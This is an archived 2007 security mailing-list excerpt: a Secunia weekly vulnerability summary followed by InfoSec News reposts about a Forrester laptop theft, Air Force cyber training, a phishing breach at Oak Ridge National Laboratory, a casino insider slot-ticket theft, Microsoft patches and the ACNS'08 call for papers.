2007-12-04 Red Hat has issued an update for the kernel. This fixes some security issues and vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/27913/ -- [SA27899] Zsh difflog.pl Insecure Temporary Files Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-03 A security issue has been reported in Zsh, which can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/27899/ -- [SA27897] Claws Mail sylprint.pl Insecure Temporary Files Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-03 A security issue has been reported in Claws Mail, which can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/27897/ -- [SA27948] Debian update for zabbix Critical: Not critical Where: From local network Impact: Privilege escalation Released: 2007-12-06 Debian has issued an update for zabbix. This fixes a weakness, which can be exploited by malicious users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/27948/ -- [SA27903] Zabbix "UserParameter" Privilege Escalation Weakness Critical: Not critical Where: From local network Impact: Privilege escalation Released: 2007-12-03 A weakness has been reported in Zabbix, which can be exploited by malicious users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/27903/ -- [SA27952] Gentoo update for hugin Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2007-12-06 Gentoo has issued an update for hugin. This fixes a security issue, which can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/27952/ -- [SA27939] OpenVMS for Integrity Servers Denial of Service Vulnerabilities Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-05 Some vulnerabilities have been reported in OpenVMS for Integrity Servers, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27939/ -- [SA27921] Avaya Products Xterm Security Bypass Security Issue Critical: Not critical Where: Local system Impact: Security Bypass Released: 2007-12-05 Avaya has acknowledged a security issue in various Avaya products, which potentially can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/27921/ -- [SA27908] Linux Kernel "do_coredump()" Information Disclosure Critical: Not critical Where: Local system Impact: Exposure of sensitive information Released: 2007-12-05 A security issue has been reported in the Linux Kernel, which can be exploited by malicious, local users to disclose potentially sensitive information. Full Advisory: http://secunia.com/advisories/27908/ -- [SA27886] Mandriva update for vixie-cron Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-04 Mandriva has issued an update for vixie-cron. This fixes a vulnerability, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27886/ -- [SA27884] Mac OS X Local Denial of Service Vulnerability Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-05 A vulnerability has been discovered in Mac OS X, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27884/ -- [SA27877] Solaris 10 Linux Branded Zones Denial of Service Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-03 A vulnerability has been reported in Solaris 10, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27877/ Other:-- [SA27904] F5 FirePass 4100 SSL VPN Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-03 Some vulnerabilities have been reported in F5 FirePass 4100 SSL VPN, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27904/ -- [SA27898] Cisco IP Phone 7940 SIP INVITE Denial of Service Vulnerability Critical: Less critical Where: From remote Impact: DoS Released: 2007-12-06 The Madynes research team has reported a vulnerability in Cisco IP Phone 7940, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27898/ -- [SA27926] Sun SPARC Enterprise XCP Firmware Denial Of Service Vulnerabilities Critical: Less critical Where: From local network Impact: DoS Released: 2007-12-05 Some vulnerabilities have been reported in the XSCF Control Package (XCP) firmware for Sun SPARC Enterprise M4000/M5000/M8000/M9000, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27926/ -- [SA27945] Nokia N95 SIP Message Processing Denial of Service Weakness Critical: Not critical Where: From remote Impact: DoS Released: 2007-12-06 Humberto J. Abdelnur, Radu State, and Olivier Festor have reported a weakness in Nokia N95, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27945/ Cross Platform:-- [SA27928] OpenOffice Database Document Processing Unspecified Code Execution Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-05 A vulnerability has been reported in OpenOffice, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27928/ -- [SA27895] tellmatic "tm_includepath" File Inclusion Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-03 ShAy6oOoN has discovered some vulnerabilities in tellmatic, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27895/ -- [SA27878] VLC Media Player ActiveX Plugin and FLAC Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-03 Some vulnerabilities have been reported in VLC Media Player, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27878/ -- [SA27876] p.mapper "_SESSION[PM_INCPHP]" File Inclusion Critical: Highly critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information, System access Released: 2007-12-03 ShAy6oOoN has reported a vulnerability in p.mapper, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27876/ -- [SA27951] vbDrupal "taxonomy_select_nodes()" SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-06 A vulnerability has been reported in vbDrupal, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27951/ -- [SA27949] SineCms SQL Injection and Script Insertion Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data, Exposure of sensitive information Released: 2007-12-06 KiNgOfThEwOrLd has discovered some vulnerabilities in SineCms, which can be exploited by malicious people to conduct script insertion and SQL injection attacks. Full Advisory: http://secunia.com/advisories/27949/ -- [SA27932] Drupal "taxonomy_select_nodes()" SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-06 A vulnerability has been reported in Drupal, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27932/ -- [SA27924] HP Select Identity Unspecified Unauthorised Access Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2007-12-05 A vulnerability has been reported in HP Select Identity, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/27924/ -- [SA27909] Beehive Forum SQL Injection and Unspecified Vulnerabilities Critical: Moderately critical Where: From remote Impact: Unknown, Manipulation of data, Exposure of sensitive information Released: 2007-12-04 Some vulnerabilities have been reported in Beehive Forum, some with unknown impact and one which can be exploited by malicious users to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27909/ -- [SA27905] Typespeed Division By Zero Denial of Service Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-03 A vulnerability has been reported in Typespeed, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27905/ -- [SA27881] Seditio "pag_sub[]" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-11-30 InATeam have discovered a vulnerability in Seditio, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27881/ -- [SA27873] Asterisk Postgres Realtime Engine SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-11-30 A vulnerability has been reported in Asterisk, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27873/ -- [SA27953] Drupal Shoutbox Module Script Insertion Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-06 Some vulnerabilities have been reported in the Shoutbox module for Drupal, which can be exploited by malicious users to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/27953/ -- [SA27941] IBM Lotus Sametime Meeting WebRunMenuFrame Page Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-06 A vulnerability has been reported in IBM Lotus Sametime, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27941/ -- [SA27925] Jetty Multiple Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting, Hijacking Released: 2007-12-05 Some vulnerabilities have been reported in Jetty, which can be exploited by malicious people to conduct HTTP response splitting and cross-site scripting attacks and potentially hijack a user session. Full Advisory: http://secunia.com/advisories/27925/ -- [SA27918] Fusion News Cross-Site Request Forgery Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-06 A vulnerability has been reported in Fusion News, which can be exploited by malicious users to conduct cross-site request forgery attacks. Full Advisory: http://secunia.com/advisories/27918/ -- [SA27906] Apache HTTP Method Request Entity Too Large Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-03 Adrian Pastor and Amir Azam have discovered a vulnerability in Apache, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27906/ -- [SA27902] CiscoWorks Common Services Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-06 Dave Lewis has reported a vulnerability in CiscoWorks Common Services, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27902/ -- [SA27900] IBM Tivoli Netcool Security Manager Unspecified Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-03 A vulnerability has been reported in IBM Tivoli Netcool Security Manager, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27900/ -- [SA27889] e2fsprogs libext2fs Integer Overflow Vulnerabilities Critical: Less critical Where: From remote Impact: DoS, System access Released: 2007-12-06 Some vulnerabilities have been reported in the libext2fs library of e2fsprogs, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/27889/ -- [SA27883] Hitachi JP1/Cm2/Network Node Manager Unspecified Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-11-30 A vulnerability has been reported in Hitachi JP1/Cm2/Network Node Manager, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27883/ -- [SA27874] CRM-CTT "CheckCustomerAccess()" Security Bypass Critical: Less critical Where: From remote Impact: Security Bypass Released: 2007-12-03 A security issue has been reported in CRM-CTT, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/27874/ -- [SA27907] Firefox Charset Inheritance Cross-Site Scripting Security Issue Critical: Not critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-04 Paul Szabo has discovered a security issue in Firefox, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27907/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From alerts at infosecnews.org Fri Dec 7 01:13:40 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Forrester Loses Laptop Containing Personnel Data Message-ID: http://www.eweek.com/article2/0,1895,2228887,00.asp By Lisa Vaas eWEEK.com December 5, 2007 The incident appears to be a clear case of, "Do as I say, not as I do." Thieves stole a laptop from the home of a Forrester Research employee during the week of Nov. 26, potentially exposing the names, addresses and Social Security numbers of an undisclosed number of current and former employees and directors, the company said in a letter mailed to those affected on Dec. 3. Forrester "Chief People Officer" Elizabeth Lemons said in the letter that the hard drive is password-protected but made no mention of encryption. The laptop contained records pertaining to those who have received grants of Forrester stock options or who have participated in the research firm's Employee Stock Purchase Plan, according to the letter. Those who have done contractual work for the consultancy, but who haven't participated in either stock plan, also appear to be affected. The incident appears to be a clear case of, "Do as I say, not as I do." Besides the irony of a technology consultancy that apparently does not encrypt sensitive data on employee laptops, the office of Forrester's "chief people officer" apparently had not informed the firm's media staff of the incident before sending out the letter. When eWEEK contacted Forrester's press hotline on Dec. 5, a staffer said that this was the first she had heard of the incident. As such, the media relations staff was not prepared with an incidence response plan. In these days of multiple weekly high-profile data breaches in the news, consultants routinely warn firms of the importance of encrypting portable data devices such as memory sticks, PDAs and laptops. They also encourage organizations to lay out incidence response plans that detail a chain of command to ensure that the right executive is informed, that public relations staff are devoted to incidence response and that the proper authorities have been notified, among other things. The idea that password protection actually protects laptop data is one that's laughed out of the room by security professionals. "Anybody with a relative clue, or at least a copy of Knoppix or F.I.R.E. [data recovery tools], could potentially bypass security measures implemented on lost or stolen drives. Period," wrote data breach experts at Attrition.org, a volunteer-run site that keeps a running list of data breaches relied on by organizations including Privacy Rights Clearinghouse. "Unless data on a drive is encrypted with a key either unknown or inaccessible to an intruder, that data is open to compromise," Attrition said in a February posting that followed the recovery of a lost VA laptop. "We won't even go into cracking AES256 or 3DES here; for the most part, such measures are impractical. Cracking algorithms over 128-bit is possible, but only with a lot of time and/or firepower. However, shoving a CD in the machine, rebooting and typing: '# mount /dev/hda1 /tmp/stolen_info/ # cd /tmp/stolen_info/ # ls -la' is not that difficult and it makes all of that 'password-protected' data quite readable, even for a casual computer user. "If the person who stole the laptop were to remove the drive and perform a bit-by-bit copy, they would circumvent any password protection on the computer. Remember, BIOS and Operating System passwords rely on the computer and OS to boot up. If you remove the drive, neither will offer any level of protection and are completely worthless." A volunteer for Attrition who goes by the online name "Lyger" told eWEEK that Forrester's notification letter to those affected "should be of little comfort," given that Forrester didn't divulge whether the laptop's hard drive was encrypted. At any rate, it may be ironic, but Forrester's dilemma is far from unique. A former analyst for a defunct technology consultancy wasn't surprised to learn the details behind the breach. "When I was at Meta, we didn't do anything in our back office that we preached to others," he said. "It is symptomatic of all businesses. They really don't pay any attention to their own employees when warned of something wrong." Forrester finds itself in good company when it comes to lost laptops. According to a recent study from the Ponemon Institute, lost and stolen laptops and mobile devices rank as the most frequent cause of a data breach: Almost half (49 percent) of data breaches in a 2007 study were due to lost or stolen laptops or other devices such as USB flash drives. That finding has been consistent throughout the years, Larry Ponemon, chairman and founder of the Ponemon Institute, told eWEEK when the study was released last week. Forrester has reported the theft to the local police department and the Middlesex County District Attorney's Office in Massachusetts. Lemons said in the Forrester letter that the theft is an "isolated incident" and does not involve a breach of network security. Forrester is providing those affectedexcepting residents of New York, due to what Forrester said are state laws restricting the practicewith a full year of credit monitoring, including $25,000 identity theft insurance. Forrester was not able to provide input for this article by the time it posted. From alerts at infosecnews.org Fri Dec 7 01:13:55 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Air Force pushes cyber warrior training Message-ID: http://www.fcw.com/online/news/151014-1.html By Peter Buxbaum FCW.com December 6, 2007 The Air Force is establishing a professional force of cyber operators and developing cyber career paths for officers, enlisted personnel and civilians. The new Air Force Cyber Command and the Air National Guard are among the focal points of the plan. Were asking ourselves, What is a cyber warrior?? Col. Anthony Buntyn, who is in line to become a brigadier general, told an industry audience at the Air Force IT Day sponsored by AFCEA in McLean, Va., Dec. 5. What skills and equipment do they need? We are developing basic criteria. The Air Force intends to provide some basic cyber training to all who enter the service, said Maj. Gen. Charles Ickes, special assistant to the deputy chief of staff for operations, and plans and requirements at the Air National Guard. In addition, as many as 40,000 cyber warfare specialists will be trained as warriors, advocates and visionaries for cyber operations. Ickes said. The scope of the training involved will differ based on the assigned duties and could take six to 15 months. It could take seven to 10 years to develop the career cyber force the Air Force is envisioning, Ickes said. Were trying to look at the best way to integrate air, space and cyber operations in everything we do, Ickes added. Cyber operators need the same freedom to maneuver as warfighters in the air or on the sea or land, Buntyn said. >From a network standpoint, our priority is to ensure our networks are survivable under attack, Buntyn added. Ickes said the Air Force is working with universities, the Air Force Academy and the Doctrine Center to develop programs and curricula for cyber trainees. One result, he added, has been the development of a new Net Warfare Training course for enlisted personnel. The enlisted force will be performing the preponderance of this work, Ickes said. We are trying to create a career path and to make this a dynamic opportunity. I think it could be a very appealing career field for young kids as the come into the military. The officer force needs more broad training in the cyber area in addition to education about a particular area of expertise. For Buntyn, connecting with private industry will be one key to developing the Air Forces cyber skills. Ickes said the Air National Guard will provide one conduit for the transfer of cyber knowledge and skills to Air Force personnel. Buxbaum is a freelancer writer in Bethesda, Md. From alerts at infosecnews.org Fri Dec 7 01:14:08 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Cyber hackers hit ORNL; thousands potentially affected Message-ID: http://www.knoxnews.com/news/2007/dec/06/cyber-hackers-hit-ornl-visitor-data-potentially-ex/ By Frank Munger Knoxville News Sentinel December 6, 2007 OAK RIDGE - Oak Ridge National Laboratory was the target of a sophisticated cyber attack that potentially gave hackers access to the personal information of thousands of visitors to the lab from 1990 to 2004, the laboratory confirmed today. ORNL Director Thom Mason informed lab staff members of the issue earlier this week and said the lab would attempt to notify as many persons as possible whose personal information may have been stolen. Lab spokesman Billy Stair said today about 12,000 letters had been sent to potential victims. Mason outlined the general aspects of the attack, which included a number of phishing e-mails sent to staff members, but he concluded the note by saying: Because of the sensitive nature of this event, the laboratory will be unable for some period to discuss further details until we better understand the full nature of this attack. Phishing is the practice of sending official-looking e-mails to extract information from victims who believe them to be from legitimate institutions such as banks. Mason told staffers that the attack appeared to be part of a coordinated attempt to gain access to computer networks at numerous laboratories and other institutions across the country. He said ORNLs cyber security team has been working nights and weekends to try to understand the nature of the attack. A spokesman at Los Alamos National Laboratory, a weapons design laboratory in New Mexico, confirmed this afternoon that LANL also was attacked by hackers. Kevin Roark of Los Alamos would not discuss the hacking, except to say that it occurred on unclassified systems and was significant and sophisticated. He said Los Alamos employees were notified Nov. 4. The first potential corruption at ORNL occurred Oct. 29, lab officials said. Our review to date has shown that while every security system at ORNL was in place and in compliance, the hackers potentially succeeded in gaining access to one of the laboratorys non-classified data bases that contained personal information of visitors to the laboratory between 1990 and 2004, Mason said. At this point we have determined that the thieves made approximately 1,100 attempt to steal data with a very sophisticated strategy that involved sending staff a total of seven phishing e-mails, all of which at first glance appeared legitimate. Investigators believe that 11 staff members opened the attachment, enabling hackers to infiltrate the system and remove data, he said. Reconstructing the event will likely take weeks, if not longer, to complete, the ORNL director said. According to Mason, the personal information potentially vulnerable would be names, dates of birth and social security numbers of lab visitors. Stairs said the visitors would include scientists, university officials, industrial and business representatives, as well as members of the news media and many others who come to the national laboratory. He said it would not include young students who tour the laboratory. More details as they develop online and in Friday's News Sentinel. -=- Related blog - Frank Munger's Atomic City Underground: Los Alamos also hacked. http://blogs.knoxnews.com/knx/munger/2007/12/los_alamos_also_hacked.html From alerts at infosecnews.org Fri Dec 7 01:14:21 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Thieves Inside the Machine Message-ID: http://www.lasvegassun.com/sunbin/stories/sun/2007/dec/06/566653097.html By Liz Benston Las Vegas Sun December 06, 2007 High-tech thieves have discovered a new way to rip off slot machines - stealing more than $1 million from the Orleans before management shut down their computer-assisted heist. Gaming regulators say the crime - one of the largest in years - shows a vulnerability in casino security that could lead to new surveillance standards. The theft began in September 2006 and allegedly involved three slot workers who, over several months, manipulated software that prints slot machine payout tickets. They allegedly worked with two accomplices who posed as customers and cashed the tickets. One defendant, slot technician Seferino Romero, pleaded guilty last month and will be sentenced in Clark County District Court on Jan. 24. Felony theft carries a maximum 10-year prison term. His attorney, Jeffrey Segal, said his client didn't mastermind the heist and has agreed to pay restitution of $100,000. "I think that his actions subsequent to the conduct indicate that this is a person of good character who got caught up in something and realizes it was a mistake," Segal said. The Orleans incident shows that other casinos are similarly vulnerable to inside jobs by casino workers, security experts say. Employee theft - sometimes as simple as pocketing cash or chips - is a recurring problem in the cash-rich industry, which can corrupt the most trusted employees. Most crimes are not publicized by casinos and regulators are reluctant to discuss them for fear of tipping hieves to new techniques. Boyd Gaming Corp., which owns the Orleans, declined to discuss the particulars of this case, which is still in progress. "It could compromise the investigation" and assist other cheats, spokesman Rob Stillwell said. Four other defendants are awaiting arraignment next year on felony theft charges. The Gaming Control Board's enforcement chief says the Orleans incident was a new one to him, although it had a familiar ring to security experts. In this case, Orleans workers printed winning tickets on test machines in a back room, using software allowing the machines to mimic machines on the slot floor that had been turned off, investigators told the Sun. The tickets were for relatively small amounts - a few hundred dollars each - to escape the notice of casino bosses. Stealing from cashless machines is a new challenge for thieves. Casinos have turned from coin slot machines to ticket machines because they are easily played and maintained and had been considered more secure than old-generation coin slots, which skilled thieves could quickly compromise using mechanical tools such as magnets and metal wands. These newer thefts typically involve casino employees with access to sensitive areas of a casino's nerve center. And therein lies the problem - and the solution - for casinos. The slot technicians involved in the Orleans theft had appropriate access to the slot testing room but probably shouldn't have been allowed to tinker with the slot system that communicates with the machines on the floor without some interaction with other departments or higher-ups, said Jerry Markling, chief of the Gaming Control Board's enforcement division. The good news for casinos is that "these are no longer easy scams" and can mostly be defeated with "strong internal controls," Markling said. Michael Crump, a Fresno-based slot security consultant, said the Orleans case is typical of an emerging scam that is foiling casinos nationwide. Many casinos rely on manufacturers to create security clearances for casino employees to access their slot tracking software, said Crump, a former executive with Boyd Gaming in Las Vegas. But those casinos may lose track of what clearances those employees have, allowing them to exploit the system later on, he said. Typically, employees who steal have stumbled upon access they shouldn't have, he said. What's especially troubling for casinos is that some employees can cover their tracks by erasing transactions or signals that could red-flag auditors, he said. The theft came to light during last month's Gaming Control Board meeting, when regulators discussed and approved a request by the South Point to put slot machines in a relatively remote part of its casino. Regulators worried about surveillance and the casino offered to post either a security guard or a slot technician at the machines. At the meeting, board member Randy Sayre said ticket machines may not be as secure as industry executives would like to believe. "It's not just a matter of, we have got the room, we have the people to watch it, let's put (slots) out there," he said. "Technology is moving forward on us and the bad guys are getting smarter." Regulators are loath to discuss details of how slot machines can be exploited, but indicated that, in a general sense, surveillance of the slots is important. Regulators generally require surveillance cameras on remote machines, though regulations specify dedicated cameras only for big jackpot machines. Some casinos don't train cameras on machines that have been shut down. Cameras may not stop an actual theft but they can be used to watch employees who might be breaking some procedure by, say, not being on the floor when they should, Crump said. Still, security clearances, rather than surveillance, are the real culprit in this case, he said. Sayre says his concern isn't with the distance of any particular slot machine from the main casino floor but the possibility that with the spread of slot machines into remote areas, a casino's security staff could be spread too thin. He says a standard policy for surveillance of remote machines would help casinos and regulators combat crooks. Sayre wonders whether manning the machines with a gaming employee would be preferable to a guard, who is trained to spot underage gamblers but perhaps not as familiar with the technical aspects of the games and how they can be compromised by cheats. Casinos lose an estimated 6 percent of revenue to internal theft, which is chalked up as a cost of doing business, Crump said. Many thieves prefer to ply their trade at smaller casinos outside of Nevada with cruder security mechanisms, he said. But Las Vegas eventually attracts the most accomplished and polished criminals, who try their hand here "to prove they can get away with it." The Orleans scam was hardly the perfect crime, Markling said. "It was only a matter of time" before the thieves were caught because the casino's high-tech slot monitoring systems can detect deviations from the expected payout of any particular slot machine, he said. All contents copyright 2005 Las Vegas SUN, Inc. From alerts at infosecnews.org Mon Dec 10 01:31:29 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Microsoft to Patch 3 Critical Flaws to Prevent System Hijacking Message-ID: http://www.eweek.com/article2/0,1895,2229965,00.asp By Lisa Vaas eWEEK.com December 7, 2007 Vista is vulnerable to three critical security flaws?in IE, Windows and multimedia technologies?that could let attackers hijack systems. Microsoft will put out seven security bulletins on Patch Tuesday, with three critical updates that could lead to systems getting hijacked via Windows, Internet Explorer, and/or Microsoft's multimedia frameworks and APIs. Vista is vulnerable to all three of the critical flaws, although Microsoft noted in a table of affected software included in its monthly advance notification that updates are currently available. One of the critical bulletins affects Windows, DirectX and DirectShow. DirectShow, a multimedia framework and API Microsoft designed to give developers a common interface for media across various programming languages, can be used to render or record media files on demand. DirectShow, which contains DirectX plugins for audio-signal processing and DirectX Video Acceleration to speed up video playback, is distributed as part of Microsoft's Platform SDK. Windows Media Player uses DirectShow, as do most video applications on Windows. Many third-party video applications use DirectShow or a variant, as well. Past security problems with DirectShow and DirectX have been sparse but serious. One critical flaw, fixed in October 2005, could have allowed an attacker to hijack a system. Microsoft also patched a critical DirectX flaw in 2003 that concerned an unchecked buffer that again could have led to a system takeover. Microsoft's second critical advisory affects Windows and Windows Media Format Runtime. Another critical advisory for Windows Media Format Runtime came out one year ago, in December 2006. That earlier flaw could have led to remote code execution. eEye's Zero-Day Tracker as of Dec. 7 wasn't showing any known zero-day vulnerabilities for DirectX, DirectShow or Windows Media Format Runtime, so users will just have to wait until Patch Tuesday on Dec. 11 to find out more on Microsoft's media security fixes. The third critical security update affects Windows and Internet Explorer. Microsoft also plans to release six non-security, high-priority updates on Microsoft Update and Windows Server Update Services. The company will also release one nonsecurity, high-priority update for Windows on Windows Update. From alerts at infosecnews.org Mon Dec 10 01:32:28 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] ACNS'08 CFP Message-ID: Forwarded from: Jianying Zhou -------------------------- ACNS 2008: CALL FOR PAPERS -------------------------- 6th International Conference on Applied Cryptography and Network Security http://acns2008.cs.columbia.edu/ Location: Columbia University, New York City, USA Date: June 3-6, 2008 Submission Deadline: 14 January 2008 23:59:59 EST Author Notification: 14 March 2008 General Chairs: Angelos Keromytis & Moti Yung Program Chairs: Steven Bellovin & Rosario Gennaro Publicity Chair: Jianying Zhou [TOPICS] Original papers on all aspects of applied cryptography and network security are solicited for submission to ACNS'08. Topics of relevance include but are not limited to: * Applied cryptography and provably-secure cryptographic protocols * Design and analysis of efficient cryptographic primitives: public-key and symmetric-key cryptosystems, block ciphers, and hash functions * Network security protocols * Techniques for anonymity; trade-offs between anonymity and utility * Integrating security into the next-generation Internet: DNS security, routing, naming, denial-of-service attacks, TCP/IP, secure multicast * Economic fraud on the Internet: phishing, pharming, spam, and click fraud * Email and web security * Public key infrastructure, key management, certification, and revocation * Security and privacy for emerging technologies: sensor networks, mobile (ad hoc) networks, peer-to-peer networks, bluetooth, 802.11, RFID * Trust metrics and robust trust inference in distributed systems * Security and usability * Intellectual property protection: metering, watermarking, and digital rights management * Modeling and protocol design for rational and malicious adversaries * Automated analysis of protocols Papers suggesting novel paradigms, original directions, or non-traditional perspectives are especially welcome. As in previous years, there will be an academic track and an industrial track. Submissions to the academic track should emphasize research contributions, while submissions to the industrial track may focus on implementation and deployment of real-world systems. Submissions for the industrial track must clearly indicate this in the title. Proceedings for the academic track will be published in Springer-Verlag's Lecture Notes in Computer Science and will be available at the conference. Papers accepted to the industrial track will be published in a different venue. [IMPORTANT DATES] Submission Deadline: 14 January,2008 23:59:59 EST Author Notification Date: 14 March, 2008 Final Version Deadline: 4 April, 2008 Conference: June 3-6, 2008 [PROGRAM COMMITTEE] Masayuki Abe (NTT, Japan) Ben Adida (Harvard University, USA) Feng Bao (Institute for Infocomm Research, Singapore) Lujo Bauer (CMU, USA) Giampaolo Bella (University of Catania, Italy) Steven Bellovin, co-chair (Columbia University, USA) John Black (University of Colorado, USA) Nikita Borisov (University of Illinois Urbana-Champaign, USA) Colin Boyd (Queensland University of Technology, Australia) Dario Catalano (University of Catania, Italy) Debra Cook (Alcatel-Lucent Bell Labs, USA) Alexander W. Dent (Royal Holloway, University of London, UK) Nelly Fazio (IBM Research, USA) Marc Fischlin (Darmstadt University of Technology, Germany) Debin Gao (Singapore Management University, Singapore) Rosario Gennaro, co-chair (IBM Research, USA) Peter Gutmann (University of Auckland, New Zealand) John Ioannidis (Packet General Networks, USA) Stanislaw Jarecki (University of California Irvine, USA) Ari Juels (RSA Laboratories, USA) Kaoru Kurosawa (Ibaraki University, Japan) Yehuda Lindell (Bar-Ilan University, Israel) Moses Liskov (William and Mary College, USA) Javier Lopez (University of Malaga, Spain) Jelena Mirkovic (USC/ISI, USA) David Naccache (Ecole Normale Superieure, France) Alina Oprea (RSA Laboratories, USA) Tom Shrimpton (Portland State University, USA) Jonathan Smith (University of Pennsylvania, USA) Angelos Stavrou (George Mason University, USA) Xiaoyun Wang (Shandong University, China) Nicholas Weaver (ICSI Berkeley, USA) Steve Weis (Google, USA) Tara Whalen (Dalhousie University, Canada) Michael Wiener (Cryptographic Clarity, Canada) Avishai Wool (Tel-Aviv University, Israel) Diego Zamboni (IBM Research, Switzerland) Jianying Zhou (Institute for Infocomm Research, Singapore) [AUTHOR INSTRUCTIONS] Submissions must be anonymous, with no author names, affiliations, acknowledgments, or obvious references. Submissions should be in English, in PDF format with all fonts embedded, typeset with 11pt font or larger, and using reasonable spacing and margins. They should not exceed 12 letter-sized pages, not counting the bibliography and appendices. Papers should begin with a title, abstract, and an introduction that clearly summarizes the contributions of the paper at a level appropriate for a non-specialist reader. Papers should contain a scholarly exposition of ideas, techniques, and results, including motivation, relevance to practical applications, and a clear comparison with related work. Committee members are not required to read appendices, and papers should be intelligible without them. Submitted papers risk being rejected without consideration of their merits if they do not follow all the above guidelines. Submissions must not substantially duplicate work that was published elsewhere, or work that any of the authors has submitted in parallel to any other conference or workshop that has proceedings. Plagiarism and double submissions will be dealt with harshly. Authors will be asked to indicate whether their submissions should be considered for the best student paper award; any paper co-authored by a full-time student is eligible for this award. Authors of accepted papers must guarantee that their paper will be presented at the conference. 